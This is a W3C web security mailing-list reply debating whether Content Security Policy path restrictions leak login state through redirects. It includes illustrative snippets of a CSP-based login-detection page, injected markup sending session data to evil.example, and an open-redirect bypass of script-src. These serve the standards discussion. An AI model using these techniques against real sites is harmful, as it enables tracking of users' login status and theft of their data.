Re: Remove paths from CSP?

Hi Sigbjorn!

On Tue, May 27, 2014 at 11:31 AM, Sigbjørn Vik <sigbjorn@opera.com> wrote:

> CSP allows more than just login detection, and makes login detection
>  even easier.


What are the risks beyond login detection?

> From (the explanation of) your link: "It seems LinkedIn and Tumblr are
> currently immune to this" So the author put in a lot of effort trying to
> detect login status of these sites, and failed. With CSP it would work
> with minimal effort, and the sites couldn't protect against it, even if
> they wanted to.
>

You elided the rest of the sentence: "It seems LinkedIn and Tumblr are
currently immune to this, _though I didn’t dig too deep_ so there might be
another redirect URL for them."

More saliently, if Tumblr indeed doesn't fall prey to this attack, then it
_also_ doesn't fall prey to the CSP-based variant. Both are mechanisms of
detecting a redirect; if the redirect doesn't happen, CSP won't catch it
either.
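For concreteness, the CSP-based variant of the attack looks something like
this (all URLs hypothetical):

```
<!-- Attacker's page, served with this response header:
     Content-Security-Policy: img-src https://social.example/img/ -->
<img src="https://social.example/img/avatar"
     onload="/* request completed without a redirect: user is logged in */"
     onerror="/* redirected to https://social.example/login, which the
                path-restricted source blocks: user is logged out */">
```

If the site never redirects that URL, neither the timing-based trick nor
this one learns anything.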

> Removing these issues in a spec might not be web-compatible. Removing
> them for a site owner is doable.


I don't think I agree with this. Timing attacks and esoterica that Michal
outlined in earlier posts[1] aside, if the platform allows you to read the
size of an image cross-origin, then you can tell whether you got an image
or something that wasn't an image. That's enough in the example I provided.
Can you elaborate on a site owner's secure response here?

[1]: http://lists.w3.org/Archives/Public/public-webappsec/2014Feb/0132.html

> Removing the hole introduced by CSP is
> not doable for a site owner, even if wishing to do so.
>

Sure it is: for example, rather than automatically redirecting, the site
could return a 403 response with a link to the login form if the user isn't
logged in. That would still be vulnerable to a number of the attacks we've
discussed here, but not the CSP variant.
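A minimal sketch of that approach (function and markup are hypothetical,
just to illustrate the shape of the fix):

```python
# Instead of 302-redirecting anonymous users to /login -- which a
# cross-origin embedder can detect via CSP path restrictions -- answer
# at the same URL with a 403 and a login link. The response URL never
# changes, so there is no redirect for CSP to observe.

def render_private_page(user_is_logged_in: bool) -> tuple[int, str]:
    """Return (status, body) for a request to a private resource."""
    if user_is_logged_in:
        return 200, "<h1>Your dashboard</h1>"
    # No redirect: same URL, just a 403 with a link to the login form.
    return 403, '<p>Please <a href="/login">log in</a> to continue.</p>'
```
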


> > 2.  Reporting provides herd immunity; even in a world where extensions
> >     are accidentally blocked by bad browser implementations (I know
> >     Blink has some bugs),
>
> I don't follow this.
>

If lots of users are hitting your site, and you're getting violation
reports when one of them is attacked via content injection, then you have
the ability to fix that hole for everyone else, even if they were never
exposed.
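As a sketch (the endpoint and URLs are hypothetical), a policy with
reporting enabled, and the kind of violation report a victim's browser
would send back:

```
Content-Security-Policy: script-src 'self'; report-uri /csp-reports

POST /csp-reports
{"csp-report": {
   "document-uri": "https://shop.example/checkout",
   "blocked-uri": "https://evil.example/steal.js",
   "violated-directive": "script-src 'self'"}}
```

One such report tells you about an injection point that affects every
visitor, not just the one who was attacked.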


> Reporting is good, agreed. If reporting is what we are after, there are
> other ways to do this, CSP is not a spec designed to provide webmasters
> with optimal reporting tools, and is not the only solution to reporting.
> Reporting can be done better and more securely in other ways.
>
> If we are serious about reporting, let us make a much better tool for
> that, without the security issues, and which can be used not only to
> determine the viability of CSP, but other site issues as well. Random
> example; I would love to see a spec for a page to determine the security
> level a browser awards it - CSP reporting can't do this, and it would be
> silly to have one reporting tool for CSP and another for this.
>

Would you mind forking this thread with a more detailed description of what
you're proposing? I don't really understand either the complaint or the
suggestion here.


> In the network layer, if the page is blocked by CSP, replace it with
> blank contents, and continue as normal. No DOM changes necessary.
> Calling it "not trivial" might have been an exaggeration. :)
>

How is that different from, or better than, returning a network error,
which is what the spec currently asks for?


> > Second, it removes CSP's ability to prevent data exfiltration (as we'd
> > have to load the resources to grab image dimensions and so on). I think
> > I must be misrepresenting this suggestion, because it seems unworkably
> > hard to me.
>
> I don't understand what ability CSP has to prevent data exfiltration,
> could you please explain? I tried analyzing this in an earlier mail[1],
> but got no responses, so I still don't see any anti-CSRF powers in CSP.
> Or did you have something else in mind? Remember that it is the origin
> which is protected by CSP, not the target.
>

If you set a policy of `default-src 'none'`, then it is difficult for
injected content to exfiltrate data, as requests to
`evil.com/?lots-of-juicy-data` will be blocked before they hit evil.com.

If we allow the request to go through so that we can grab image sizes, for
instance, then we lose the ability to prevent that connection.
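Roughly (hypothetical URLs):

```
Content-Security-Policy: default-src 'none'; img-src https://cdn.shop.example

<!-- Injected markup; the request is blocked before it is ever made: -->
<img src="https://evil.example/?c=stolen-session-data">
```

Any scheme that fetches the resource first, in order to inspect it, gives
up exactly that guarantee.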

> Let me quote you ;)
> "More to the point, please assume that I and everyone like me is a
> terrible programmer. :)"
> I do not believe most web developers are going to read the CSP spec, far
> less understand it. I believe most will find a working template on
> stackoverflow, and copy it in uncritically.
>

In that sad, sad world where no one reads specs, I fail to see how you can
claim that developers would be _more_ confused. They'd already have no idea
what's happening, and would be relying on magic safety dust that they
sprinkle around their sites. :)


> > At worst, we end up in a world where path restrictions don't exist for
> > developers who inadvertently allow redirects into otherwise whitelisted
> > paths. They still have origin-based protections of CSP 1.0. I see that
> > as a reasonable baseline, though I would certainly appreciate any
> > suggestions that didn't involve that compromise.
>
> I think this is much closer to the best case scenario.


In the current proposal, `script-src example.com/js` is equivalent to
`script-src example.com` after a redirect. This isn't the best-case
scenario: it is _the_ scenario. :)
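That is, given a hypothetical open redirector under the whitelisted path:

```
Content-Security-Policy: script-src example.com/js/

<!-- Blocked: outside the whitelisted path. -->
<script src="https://example.com/uploads/evil.js"></script>

<!-- Allowed under the current proposal: /js/go matches the path, and
     the path restriction is ignored after the redirect it triggers. -->
<script src="https://example.com/js/go?u=/uploads/evil.js"></script>
```

The origin check still applies in both cases; only the path component is
lost across the redirect.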


> Developers may
> apply CSP, believe they have secured their sites, and leave it at that.
> They don't know that open redirects stop path restrictions from working,
> nor that another part of the site has an open redirect. Since they left
> the security of the site with CSP, and it doesn't work, they are now
> worse off than without CSP.


Developers who do this are, bluntly, out of luck. CSP mitigates risks. It
isn't magic, and it isn't perfect. We explicitly state in the spec (3rd
paragraph of the introduction) that CSP isn't the first (or only!) line of
defense, and is intended as defense in depth. What else would you like us
to do to make that clear?


> So the worst case scenario is that sites get
> even less secure than before.
>

I don't understand this conclusion. Again, `script-src example.com` is
still significantly better than nothing. Script can't load from `evil.com`,
for instance. That seems like a significant improvement.


> To weigh the risks, it is important to understand the threats.
> Currently, phishing is by far the largest threat on the net, XSS is
> miles behind. If phishing is critical severity, then XSS is only high
> severity.


They're both bad. I continue to believe that XSS is more problematic, but
I'm not sure there are any good arguments to be made either way. Bad is
bad. Badder is also bad. Either way: bad.


> The more a phisher can know about a user, the more convincing
> phishes can be made, and redirection detection will give phishers more
> power.
>

Let's explore this a bit, as you're correct: it's important.

1. Targeted (spear) phishing is quite a bad threat. It, however, relies on
knowledge of the target. If you're an attacker targeting _me_, you'll know
that I use Google and Twitter. If you're an attacker targeting Codero.com
so you can own the RSA conference site, you're going to phish with the
Codero login page. CSP is not a relevant vector for gathering this
information for these types of attacks.

2. Anecdotally, untargeted phishing comes via email ("You totally need to
verify your PayPal account, really."), where (I hope) it isn't possible to
execute meaningful JavaScript in order to mutate the message to target the
entities to which I'm logged in.

What is the scenario in which a CSP-based attack gives you leverage over a
user in ways that (significantly?) increase the risk of phishing?

> So the way I see it, CSP exacerbates the worst threat on the internet,
> and leaves no recourse possible.


Well, no recourse that continues to be user-friendly and automatic. A
developer could certainly just not redirect (returning a 403 instead) for
unknown users, as noted above.


> On the good side, it allows
> knowledgeable webmasters (a small percentage of all webmasters) yet
> another way to protect themselves against a non-critical security risk.
>

I think that's all we can do: we build something that can help, and do our
best to inform developers about its existence.


> However, if attempted by non-knowledgeable webmasters, they risk making
> their site less secure.
>

Any policy, no matter how poorly constructed, is purely restrictive. "No
inline script." "No CSS except from these 8,000 sources." etc. I do not
understand the claim that _any_ policy makes a site less secure. That
shouldn't be possible.

-mike

Received on Wednesday, 28 May 2014 12:16:04 UTC